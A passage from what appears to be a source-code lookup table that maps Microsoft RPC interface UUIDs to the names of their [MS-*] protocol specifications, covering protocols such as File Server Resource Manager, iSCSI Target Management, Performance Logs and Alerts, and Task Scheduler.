L"E65E8028-83E8-491B-9AF7-AAF6BD51A0CE", L"[MS-DFSRH]: DFS Replication Helper Protocol" }, 439 | { L"D3766938-9FB7-4392-AF2F-2CE8749DBBD0", L"[MS-DFSRH]: DFS Replication Helper Protocol" }, 440 | { L"4BB8AB1D-9EF9-4100-8EB6-DD4B4E418B72", L"[MS-DFSRH]: DFS Replication Helper Protocol" }, 441 | { L"CEB5D7B4-3964-4F71-AC17-4BF57A379D87", L"[MS-DFSRH]: DFS Replication Helper Protocol" }, 442 | { L"7A2323C7-9EBE-494A-A33C-3CC329A18E1D", L"[MS-DFSRH]: DFS Replication Helper Protocol" }, 443 | { L"20D15747-6C48-4254-A358-65039FD8C63C", L"[MS-DFSRH]: DFS Replication Helper Protocol" }, 444 | { L"C4B0C7D9-ABE0-4733-A1E1-9FDEDF260C7A", L"[MS-DFSRH]: DFS Replication Helper Protocol" }, 445 | { L"6BFFD098-A112-3610-9833-46C3F874532D", L"[MS-DHCPM]: Microsoft Dynamic Host Configuration Protocol (DHCP)" }, 446 | { L"5B821720-F63B-11D0-AAD2-00C04FC324DB", L"[MS-DHCPM]: Microsoft Dynamic Host Configuration Protocol (DHCP)" }, 447 | { L"4DA1C422-943D-11D1-ACAE-00C04FC2AA3F", L"[MS-DLTM]: Distributed Link Tracking:" }, 448 | { L"300F3532-38CC-11D0-A3F0-0020AF6B0ADD", L"[MS-DLTW]: Distributed Link Tracking:" }, 449 | { L"D2D79DF5-3400-11D0-B40B-00AA005FF586", L"[MS-DMRP]: Disk Management Remote Protocol" }, 450 | { L"DEB01010-3A37-4D26-99DF-E2BB6AE3AC61", L"[MS-DMRP]: Disk Management Remote Protocol" }, 451 | { L"3A410F21-553F-11D1-8E5E-00A0C92C9D5D", L"[MS-DMRP]: Disk Management Remote Protocol" }, 452 | { L"D2D79DF7-3400-11D0-B40B-00AA005FF586", L"[MS-DMRP]: Disk Management Remote Protocol" }, 453 | { L"4BDAFC52-FE6A-11D2-93F8-00105A11164A", L"[MS-DMRP]: Disk Management Remote Protocol" }, 454 | { L"135698D2-3A37-4D26-99DF-E2BB6AE3AC61", L"[MS-DMRP]: Disk Management Remote Protocol" }, 455 | { L"50ABC2A4-574D-40B3-9D66-EE4FD5FBA076", L"[MS-DNSP]: Domain Name Service (DNS) Server Management" }, 456 | { L"7C44D7D4-31D5-424C-BD5E-2B3E1F323D22", L"[MS-DRSR]: Directory Replication Service (DRS) Remote Protocol" }, 457 | { L"3919286A-B10C-11D0-9BA8-00C04FD92EF5", L"[MS-DSSP]: Directory Services Setup Remote Protocol" }, 458 | { L"14A8831C-BC82-11D2-8A64-0008C7457E5D", L"[MS-EERR]: ExtendedError Remote Data Structure" }, 459 | { L"C681D488-D850-11D0-8C52-00C04FD90F7E", L"[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol" }, 460 | { L"82273FDC-E32A-18C3-3F78-827929DC23EA", L"[MS-EVEN]: EventLog Remoting Protocol" }, 461 | { L"6B5BDD1E-528C-422C-AF8C-A4079BE4FE48", L"[MS-FASP]: Firewall and Advanced Security Protocol" }, 462 | { L"6099FC12-3EFF-11D0-ABD0-00C04FD91A4E", L"[MS-FAX]: Fax Server and Client Remote Protocol" }, 463 | { L"EA0A3165-4834-11D2-A6F8-00C04FA346CC", L"[MS-FAX]: Fax Server and Client Remote Protocol" }, 464 | { L"897E2E5F-93F3-4376-9C9C-FD2277495C27", L"[MS-FRS2]: Distributed File System Replication Protocol" }, 465 | { L"377F739D-9647-4B8E-97D2-5FFCE6D759CD", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 466 | { L"F411D4FD-14BE-4260-8C40-03B7C95E608A", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 467 | { L"4C8F96C3-5D94-4F37-A4F4-F56AB463546F", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 468 | { L"CFE36CBA-1949-4E74-A14F-F1D580CEAF13", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 469 | { L"8276702F-2532-4839-89BF-4872609A2EA4", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 470 | { L"4A73FEE4-4102-4FCC-9FFB-38614F9EE768", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 471 | { L"F3637E80-5B22-4A2B-A637-BBB642B41CFC", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 472 | { L"1568A795-3924-4118-B74B-68D8F0FA5DAF", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 473 | { L"6F4DBFFF-6920-4821-A6C3-B7E94C1FD60C", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 474 | { L"39322A2D-38EE-4D0D-8095-421A80849A82", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 475 | { L"326AF66F-2AC0-4F68-BF8C-4759F054FA29", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 476 | { L"27B899FE-6FFA-4481-A184-D3DAADE8A02B", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 477 | { L"E1010359-3E5D-4ECD-9FE4-EF48622FDF30", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 478 | { L"8DD04909-0E34-4D55-AFAA-89E1F1A1BBB9", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 479 | { L"96DEB3B5-8B91-4A2A-9D93-80A35D8AA847", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 480 | { L"D8CC81D9-46B8-4FA4-BFA5-4AA9DEC9B638", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 481 | { L"EDE0150F-E9A3-419C-877C-01FE5D24C5D3", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 482 | { L"15A81350-497D-4ABA-80E9-D4DBCC5521FE", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 483 | { L"12937789-E247-4917-9C20-F3EE9C7EE783", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 484 | { L"F76FBF3B-8DDD-4B42-B05A-CB1C3FF1FEE8", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 485 | { L"CB0DF960-16F5-4495-9079-3F9360D831DF", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 486 | { L"4846CB01-D430-494F-ABB4-B1054999FB09", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 487 | { L"6CD6408A-AE60-463B-9EF1-E117534D69DC", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 488 | { L"EE321ECB-D95E-48E9-907C-C7685A013235", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 489 | { L"38E87280-715C-4C7D-A280-EA1651A19FEF", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 490 | { L"BEE7CE02-DF77-4515-9389-78F01C5AFC1A", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 491 | { L"9A2BF113-A329-44CC-809A-5C00FCE8DA40", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 492 | { L"4173AC41-172D-4D52-963C-FDC7E415F717", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 493 | { L"AD55F10B-5F11-4BE7-94EF-D9EE2E470DED", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 494 | { L"BB36EA26-6318-4B8C-8592-F72DD602E7A5", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 495 | { L"FF4FA04E-5A94-4BDA-A3A0-D5B4D3C52EBA", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 496 | { L"22BCEF93-4A3F-4183-89F9-2F8B8A628AEE", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 497 | { L"6879CAF9-6617-4484-8719-71C3D8645F94", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 498 | { L"5F6325D3-CE88-4733-84C1-2D6AEFC5EA07", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 499 | { L"8BB68C7D-19D8-4FFB-809E-BE4FC1734014", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 500 | { L"A2EFAB31-295E-46BB-B976-E86D58B52E8B", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 501 | { L"0770687E-9F36-4D6F-8778-599D188461C9", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 502 | { L"AFC052C2-5315-45AB-841B-C6DB0E120148", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 503 | { L"515C1277-2C81-440E-8FCF-367921ED4F59", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 504 | { L"D2DC89DA-EE91-48A0-85D8-CC72A56F7D04", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 505 | { L"47782152-D16C-4229-B4E1-0DDFE308B9F6", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 506 | { L"205BEBF8-DD93-452A-95A6-32B566B35828", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 507 | { L"1BB617B8-3886-49DC-AF82-A6C90FA35DDA", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 508 | { L"42DC3511-61D5-48AE-B6DC-59FC00C0A8D6", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 509 | { L"426677D5-018C-485C-8A51-20B86D00BDC4", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 510 | { L"E946D148-BD67-4178-8E22-1C44925ED710", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 511 | { L"D646567D-26AE-4CAA-9F84-4E0AAD207FCA", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 512 | { L"F82E5729-6ABA-4740-BFC7-C7F58F75FB7B", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 513 | { L"2DBE63C4-B340-48A0-A5B0-158E07FC567E", L"[MS-FSRM]: File Server Resource Manager Protocol" }, 514 | { L"A8E0653C-2744-4389-A61D-7373DF8B2292", L"[MS-FSRVP]: File Server Remote VSS Protocol" }, 515 | { L"B9785960-524F-11DF-8B6D-83DCDED72085", L"[MS-GKDI]: Group Key Distribution Protocol" }, 516 | { L"91AE6020-9E3C-11CF-8D7C-00AA00C091BE", L"[MS-ICPR]: ICertPassage Remote Protocol" }, 517 | { L"E8FB8620-588F-11D2-9D61-00C04F79C5FE", L"[MS-IISS]: Internet Information Services (IIS) ServiceControl" }, 518 | { L"F612954D-3B0B-4C56-9563-227B7BE624B4", L"[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW" }, 519 | { L"8298D101-F992-43B7-8ECA-5052D885B995", L"[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW" }, 520 | { L"29822AB8-F302-11D0-9953-00C04FD919C1", L"[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW" }, 521 | { L"70B51430-B6CA-11D0-B9B9-00A0C922E750", L"[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW" }, 522 | { L"29822AB7-F302-11D0-9953-00C04FD919C1", L"[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW" }, 523 | { L"BD0C73BC-805B-4043-9C30-9A28D64DD7D2", L"[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW" }, 524 | { L"7C4E1804-E342-483D-A43E-A850CFCC8D18", L"[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW" }, 525 | { L"6619A740-8154-43BE-A186-0319578E02DB", L"[MS-IOI]: IManagedObject Interface Protocol" }, 526 | { L"8165B19E-8D3A-4D0B-80C8-97DE310DB583", L"[MS-IOI]: IManagedObject Interface Protocol" }, 527 | { L"C3FCC19E-A970-11D2-8B5A-00A0C9B7C9C4", L"[MS-IOI]: IManagedObject Interface Protocol" }, 528 | { L"82AD4280-036B-11CF-972C-00AA006887B0", L"[MS-IRP]: Internet Information Services (IIS) Inetinfo Remote" }, 529 | { L"4E65A71E-4EDE-4886-BE67-3C90A08D1F29", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 530 | { L"866A78BC-A2FB-4AC4-94D5-DB3041B4ED75", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 531 | { L"B0D1AC4B-F87A-49B2-938F-D439248575B2", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 532 | { L"E141FD54-B79E-4938-A6BB-D523C3D49FF1", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 533 | { L"40CC8569-6D23-4005-9958-E37F08AE192B", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 534 | { L"1822A95E-1C2B-4D02-AB25-CC116DD9DBDE", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 535 | { L"B4FA8E86-2517-4A88-BD67-75447219EEE4", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 536 | { L"3C73848A-A679-40C5-B101-C963E67F9949", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 537 | { L"66C9B082-7794-4948-839A-D8A5A616378F", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 538 | { L"01454B97-C6A5-4685-BEA8-9779C88AB990", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 539 | { L"D6BD6D63-E8CB-4905-AB34-8A278C93197A", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 540 | { L"348A0821-69BB-4889-A101-6A9BDE6FA720", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 541 | { L"703E6B03-7AD1-4DED-BA0D-E90496EBC5DE", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 542 | { L"100DA538-3F4A-45AB-B852-709148152789", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 543 | { L"592381E5-8D3C-42E9-B7DE-4E77A1F75AE4", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 544 | { L"883343F1-CEED-4E3A-8C1B-F0DADFCE281E", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 545 | { L"6AEA6B26-0680-411D-8877-A148DF3087D5", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 546 | { L"D71B2CAE-33E8-4567-AE96-3CCF31620BE2", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 547 | { L"8C58F6B3-4736-432A-891D-389DE3505C7C", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 548 | { L"1995785D-2A1E-492F-8923-E621EACA39D9", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 549 | { L"C10A76D8-1FE4-4C2F-B70D-665265215259", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 550 | { L"8D7AE740-B9C5-49FC-A11E-89171907CB86", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 551 | { L"8AD608A4-6C16-4405-8879-B27910A68995", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 552 | { L"B0076FEC-A921-4034-A8BA-090BC6D03BDE", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 553 | { L"640038F1-D626-40D8-B52B-09660601D045", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 554 | { L"BB39E296-AD26-42C5-9890-5325333BB11E", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 555 | { L"B06A64E3-814E-4FF9-AFAC-597AD32517C7", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 556 | { L"A5ECFC73-0013-4A9E-951C-59BF9735FDDA", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 557 | { L"1396DE6F-A794-4B11-B93F-6B69A5B47BAE", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 558 | { L"DD6F0A28-248F-4DD3-AFE9-71AED8F685C4", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 559 | { L"52BA97E7-9364-4134-B9CB-F8415213BDD8", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 560 | { L"E2842C88-07C3-4EB0-B1A9-D3D95E76FEF2", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 561 | { L"312CC019-D5CD-4CA7-8C10-9E0A661F147E", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 562 | { L"345B026B-5802-4E38-AC75-795E08B0B83F", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 563 | { L"442931D5-E522-4E64-A181-74E98A4E1748", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 564 | { L"1B1C4D1C-ABC4-4D3A-8C22-547FBA3AA8A0", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 565 | { L"56E65EA5-CDFF-4391-BA76-006E42C2D746", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 566 | { L"E645744B-CAE5-4712-ACAF-13057F7195AF", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 567 | { L"FE7F99F9-1DFB-4AFB-9D00-6A8DD0AABF2C", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 568 | { L"81FE3594-2495-4C91-95BB-EB5785614EC7", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 569 | { L"F093FE3D-8131-4B73-A742-EF54C20B337B", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 570 | { L"28BC8D5E-CA4B-4F54-973C-ED9622D2B3AC", L"[MS-ISTM]: iSCSI Software Target Management Protocol" }, 571 | { L"22E5386D-8B12-4BF0-B0EC-6A1EA419E366", L"[MS-LREC]: Live Remote Event Capture (LREC) Protocol" }, 572 | { L"12345778-1234-ABCD-EF00-0123456789AB", L"[MS-LSAT]: Local Security Authority (Translation Methods) Remote" }, 573 | { L"708CCA10-9569-11D1-B2A5-0060977D8118", L"[MS-MQDS]: Message Queuing (MSMQ):" }, 574 | { L"77DF7A80-F298-11D0-8358-00A024C480A8", L"[MS-MQDS]: Message Queuing (MSMQ):" }, 575 | { L"76D12B80-3467-11D3-91FF-0090272F9EA3", L"[MS-MQMP]: Message Queuing (MSMQ):" }, 576 | { L"FDB3A030-065F-11D1-BB9B-00A024EA5525", L"[MS-MQMP]: Message Queuing (MSMQ):" }, 577 | { L"41208EE0-E970-11D1-9B9E-00E02C064C39", L"[MS-MQMR]: Message Queuing (MSMQ):" }, 578 | { L"1088A980-EAE5-11D0-8D9B-00A02453C337", L"[MS-MQQP]: Message Queuing (MSMQ):" }, 579 | { L"1A9134DD-7B39-45BA-AD88-44D01CA47F28", L"[MS-MQRR]: Message Queuing (MSMQ):" }, 580 | { L"17FDD703-1827-4E34-79D4-24A55C53BB37", L"[MS-MSRP]: Messenger Service Remote Protocol" }, 581 | { L"12345678-1234-ABCD-EF00-01234567CFFB", L"[MS-NRPC]: Netlogon Remote Protocol" }, 582 | { L"00020411-0000-0000-C000-000000000046", L"[MS-OAUT]: OLE Automation Protocol" }, 583 | { L"00020401-0000-0000-C000-000000000046", L"[MS-OAUT]: OLE Automation Protocol" }, 584 | { L"00020403-0000-0000-C000-000000000046", L"[MS-OAUT]: OLE Automation Protocol" }, 585 | { L"00020412-0000-0000-C000-000000000046", L"[MS-OAUT]: OLE Automation Protocol" }, 586 | { L"00020402-0000-0000-C000-000000000046", L"[MS-OAUT]: OLE Automation Protocol" }, 587 | { L"00020400-0000-0000-C000-000000000046", L"[MS-OAUT]: OLE Automation Protocol" }, 588 | { L"00020404-0000-0000-C000-000000000046", L"[MS-OAUT]: OLE Automation Protocol" }, 589 | { L"784B693D-95F3-420B-8126-365C098659F2", L"[MS-OCSPA]: Microsoft OCSP Administration Protocol" }, 590 | { L"AE33069B-A2A8-46EE-A235-DDFD339BE281", L"[MS-PAN]: Print System Asynchronous Notification Protocol" }, 591 | { L"0B6EDBFA-4A24-4FC6-8A23-942B1ECA65D1", L"[MS-PAN]: Print System Asynchronous Notification Protocol" }, 592 | { L"76F03F96-CDFD-44FC-A22C-64950A001209", L"[MS-PAR]: Print System Asynchronous Remote Protocol" }, 593 | { L"DA5A86C5-12C2-4943-AB30-7F74A813D853", L"[MS-PCQ]: Performance Counter Query Protocol" }, 594 | { L"03837510-098B-11D8-9414-505054503030", L"[MS-PLA]: Performance Logs and Alerts Protocol" }, 595 | { L"03837543-098B-11D8-9414-505054503030", L"[MS-PLA]: Performance Logs and Alerts Protocol" }, 596 | { L"03837533-098B-11D8-9414-505054503030", L"[MS-PLA]: Performance Logs and Alerts Protocol" }, 597 | { L"03837541-098B-11D8-9414-505054503030", L"[MS-PLA]: Performance Logs and Alerts Protocol" }, 598 | { L"03837544-098B-11D8-9414-505054503030", L"[MS-PLA]: Performance Logs and Alerts Protocol" }, 599 | { L"03837524-098B-11D8-9414-505054503030", L"[MS-PLA]: Performance Logs and Alerts Protocol" }, 600 | { L"0383753A-098B-11D8-9414-505054503030", L"[MS-PLA]: Performance Logs and Alerts Protocol" }, 601 | { L"03837534-098B-11D8-9414-505054503030", L"[MS-PLA]: Performance Logs and Alerts Protocol" }, 602 | { L"0383750B-098B-11D8-9414-505054503030", L"[MS-PLA]: Performance Logs and Alerts Protocol" }, 603 | { L"0383751A-098B-11D8-9414-505054503030", L"[MS-PLA]: Performance Logs and Alerts Protocol" }, 604 | { L"03837512-098B-11D8-9414-505054503030", L"[MS-PLA]: Performance Logs and Alerts Protocol" }, 605 | { L"0383753D-098B-11D8-9414-505054503030", L"[MS-PLA]: Performance Logs and Alerts Protocol" }, 606 | { L"03837506-098B-11D8-9414-505054503030", L"[MS-PLA]: Performance Logs and Alerts Protocol" }, 607 | { L"03837520-098B-11D8-9414-505054503030", L"[MS-PLA]: Performance Logs and Alerts Protocol" }, 608 | { L"038374FF-098B-11D8-9414-505054503030", L"[MS-PLA]: Performance Logs and Alerts Protocol" }, 609 | { L"03837514-098B-11D8-9414-505054503030", L"[MS-PLA]: Performance Logs and Alerts Protocol" }, 610 | { L"03837502-098B-11D8-9414-505054503030", L"[MS-PLA]: Performance Logs and Alerts Protocol" }, 611 | { L"03837516-098B-11D8-9414-505054503030", L"[MS-PLA]: Performance Logs and Alerts Protocol" }, 612 | { L"0B1C2170-5732-4E0E-8CD3-D9B16F3B84D7", L"[MS-RAA]: Remote Authorization API Protocol" }, 613 | { L"F120A684-B926-447F-9DF4-C966CB785648", L"[MS-RAI]: Remote Assistance Initiation Protocol" }, 614 | { L"833E4010-AFF7-4AC3-AAC2-9F24C1457BCE", L"[MS-RAI]: Remote Assistance Initiation Protocol" }, 615 | { L"833E4200-AFF7-4AC3-AAC2-9F24C1457BCE", L"[MS-RAI]: Remote Assistance Initiation Protocol" }, 616 | { L"3C3A70A7-A468-49B9-8ADA-28E11FCCAD5D", L"[MS-RAI]: Remote Assistance Initiation Protocol" }, 617 | { L"833E4100-AFF7-4AC3-AAC2-9F24C1457BCE", L"[MS-RAI]: Remote Assistance Initiation Protocol" }, 618 | { L"833E41AA-AFF7-4AC3-AAC2-9F24C1457BCE", L"[MS-RAI]: Remote Assistance Initiation Protocol" }, 619 | { L"C323BE28-E546-4C23-A81B-D6AD8D8FAC7B", L"[MS-RAINPS]: Remote Administrative Interface:" }, 620 | { L"83E05BD5-AEC1-4E58-AE50-E819C7296F67", L"[MS-RAINPS]: Remote Administrative Interface:" }, 621 | { L"45F52C28-7F9F-101A-B52B-08002B2EFABE", L"[MS-RAIW]: Remote Administrative Interface:" }, 622 | { L"811109BF-A4E1-11D1-AB54-00A0C91E9B45", L"[MS-RAIW]: Remote Administrative Interface:" }, 623 | { L"A35AF600-9CF4-11CD-A076-08002B2BD711", L"[MS-RDPESC]: Remote Desktop Protocol:" }, 624 | { L"12345678-1234-ABCD-EF00-0123456789AB", L"[MS-RPRN]: Print System Remote Protocol" }, 625 | { L"66A2DB21-D706-11D0-A37B-00C04FC9DA04", L"[MS-RRASM]: Routing and Remote Access Server (RRAS) Management" }, 626 | { L"66A2DB1B-D706-11D0-A37B-00C04FC9DA04", L"[MS-RRASM]: Routing and Remote Access Server (RRAS) Management" }, 627 | { L"66A2DB20-D706-11D0-A37B-00C04FC9DA04", L"[MS-RRASM]: Routing and Remote Access Server (RRAS) Management" }, 628 | { L"66A2DB22-D706-11D0-A37B-00C04FC9DA04", L"[MS-RRASM]: Routing and Remote Access Server (RRAS) Management" }, 629 | { L"8F09F000-B7ED-11CE-BBD2-00001A181CAD", L"[MS-RRASM]: Routing and Remote Access Server (RRAS) Management" }, 630 | { L"5FF9BDF6-BD91-4D8B-A614-D6317ACC8DD8", L"[MS-RRASM]: Routing and Remote Access Server (RRAS) Management" }, 631 | { L"20610036-FA22-11CF-9823-00A0C911E5DF", L"[MS-RRASM]: Routing and Remote Access Server (RRAS) Management" }, 632 | { L"67E08FC2-2984-4B62-B92E-FC1AAE64BBBB", L"[MS-RRASM]: Routing and Remote Access Server (RRAS) Management" }, 633 | { L"6139D8A4-E508-4EBB-BAC7-D7F275145897", L"[MS-RRASM]: Routing and Remote Access Server (RRAS) Management" }, 634 | { L"338CD001-2244-31F1-AAAA-900038001003", L"[MS-RRP]: Windows Remote Registry Protocol" }, 635 | { L"3BBED8D9-2C9A-4B21-8936-ACB2F995BE6C", L"[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol" }, 636 | { L"8DA03F40-3419-11D1-8FB1-00A024CB6019", L"[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol" }, 637 | { L"D61A27C6-8F53-11D0-BFA0-00A024151983", L"[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol" }, 638 | { L"081E7188-C080-4FF3-9238-29F66D6CABFD", L"[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol" }, 639 | { L"895A2C86-270D-489D-A6C0-DC2A9B35280E", L"[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol" }, 640 | { L"D02E4BE0-3419-11D1-8FB1-00A024CB6019", L"[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol" }, 641 | { L"DB90832F-6910-4D46-9F5E-9FD6BFA73903", L"[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol" }, 642 | { L"4E934F30-341A-11D1-8FB1-00A024CB6019", L"[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol" }, 643 | { L"879C8BBE-41B0-11D1-BE11-00C04FB6BF70", L"[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol" }, 644 | { L"69AB7050-3059-11D1-8FAF-00A024CB6019", L"[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol" }, 645 | { L"7D07F313-A53F-459A-BB12-012C15B1846E", L"[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol" }, 646 | { L"BB39332C-BFEE-4380-AD8A-BADC8AFF5BB6", L"[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol" }, 647 | { L"B057DC50-3059-11D1-8FAF-00A024CB6019", L"[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol" }, 648 | { L"894DE0C0-0D55-11D3-A322-00C04FA321A1", L"[MS-RSP]: Remote Shutdown Protocol" }, 649 | { L"D95AFE70-A6D5-4259-822E-2C84DA1DDB0D", L"[MS-RSP]: Remote Shutdown Protocol" }, 650 | { L"12345778-1234-ABCD-EF00-0123456789AC", L"[MS-SAMR]: Security Account Manager (SAM) Remote Protocol" }, 651 | { L"01954E6B-9254-4E6E-808C-C9E05D007696", L"[MS-SCMP]: Shadow Copy Management Protocol" }, 652 | { L"FA7DF749-66E7-4986-A27F-E2F04AE53772", L"[MS-SCMP]: Shadow Copy Management Protocol" }, 653 | { L"214A0F28-B737-4026-B847-4F9E37D79529", L"[MS-SCMP]: Shadow Copy Management Protocol" }, 654 | { L"AE1C7110-2F60-11D3-8A39-00C04F72D8E3", L"[MS-SCMP]: Shadow Copy Management Protocol" }, 655 | { L"367ABB81-9844-35F1-AD32-98F038001003", L"[MS-SCMR]: Service Control Manager Remote Protocol" }, 656 | { L"4B324FC8-1670-01D3-1278-5A47BF6EE188", L"[MS-SRVS]: Server Service Remote Protocol" }, 657 | { L"CCD8C074-D0E5-4A40-92B4-D074FAA6BA28", L"[MS-SWN]: Service Witness Protocol" }, 658 | { L"1A1BB35F-ABB8-451C-A1AE-33D98F1BEF4A", L"[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card" }, 659 | { L"1C60A923-2D86-46AA-928A-E7F3E37577AF", L"[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card" }, 660 | { L"FDF8A2B9-02DE-47F4-BC26-AA85AB5E5267", L"[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card" }, 661 | { L"112B1DFF-D9DC-41F7-869F-D67FEE7CB591", L"[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card" }, 662 | { L"152EA2A8-70DC-4C59-8B2A-32AA3CA0DCAC", L"[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card" }, 663 | { L"16A18E86-7F6E-4C20-AD89-4FFC0DB7A96A", L"[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card" }, 664 | { L"3C745A97-F375-4150-BE17-5950F694C699", L"[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card" }, 665 | { L"2F5F6521-CA47-1068-B319-00DD010662DB", L"[MS-TRP]: Telephony Remote Protocol" }, 666 | { L"2F5F6520-CA46-1067-B319-00DD010662DA", L"[MS-TRP]: Telephony Remote Protocol" }, 667 | { L"1FF70682-0A51-30E8-076D-740BE8CEE98B", L"[MS-TSCH]: Task Scheduler Service Remoting Protocol" }, 668 | { L"378E52B0-C0A9-11CF-822D-00AA0051E40F", L"[MS-TSCH]: Task Scheduler Service Remoting Protocol" }, 669 | { L"86D35949-83C9-4044-B424-DB363231FD0C", L"[MS-TSCH]: Task Scheduler Service Remoting Protocol" }, 670 | { L"44E265DD-7DAF-42CD-8560-3CDB6E7A2729", L"[MS-TSGU]: Terminal Services Gateway Server Protocol" }, 671 | { L"034634FD-BA3F-11D1-856A-00A0C944138C", L"[MS-TSRAP]: Telnet Server Remote Administration Protocol" }, 672 | { L"497D95A6-2D27-4BF5-9BBD-A6046957133C", L"[MS-TSTS]: Terminal Services Terminal Server Runtime Interface" }, 673 | { L"11899A43-2B68-4A76-92E3-A3D6AD8C26CE", L"[MS-TSTS]: Terminal Services 